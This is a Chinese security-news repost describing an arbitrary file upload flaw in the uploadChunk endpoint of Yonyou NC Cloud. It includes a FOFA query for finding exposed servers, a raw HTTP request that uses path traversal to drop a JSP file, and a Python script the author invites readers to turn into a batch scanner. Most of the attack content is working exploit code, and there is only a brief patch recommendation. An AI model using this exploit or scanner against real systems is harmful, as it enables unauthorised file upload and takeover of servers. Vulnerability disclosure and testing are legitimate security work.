声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,禁止私自转载,如需转载,请联系作者!!!!
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!!!!!
漏洞介绍
X友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,基于云原生架构,打造开放、互联、融合、智能的一体化云平台,X友NC Cloud uploadChunk存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
影响版本
用友NC Cloud uploadChunk漏洞情报
fofa语句
app="用友NC Cloud uploadChunk"Poc
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0Accept-Encoding: gzip, deflate**************************************--bd966ad8118cfcc67ee341272f2900c4Content-Disposition: form-data; name="file"; filename="ncchr_log.jsp"<%out.println("12345678");%>--bd966ad8118cfcc67ee341272f2900c4--
Poc验证工具
这里给个基础的demo,大佬们自己改成批量就可以了。
import requests# 输入目标主机和路径host = "your_host"path = "/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1"# 构建完整的URLurl = f"http://{host}{path}"# 定义请求头headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0","Accept-Encoding": "gzip, deflate",}# 定义请求体payload = """**************************************--bd966ad8118cfcc67ee341272f2900c4Content-Disposition: form-data; name="file"; filename="ncchr_log.jsp"<%out.println("12345678");%>--bd966ad8118cfcc67ee341272f2900c4--"""# 发送 POST 请求response = requests.post(url, headers=headers, data=payload)# 检查响应状态码if response.status_code == 200:print("验证成功")else:print("验证失败")
修复建议
建议及时更新至最新版本!关注我们
原文始发于微信公众号(极星信安):安全情报,X友NC存在任意文件上传漏洞!!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论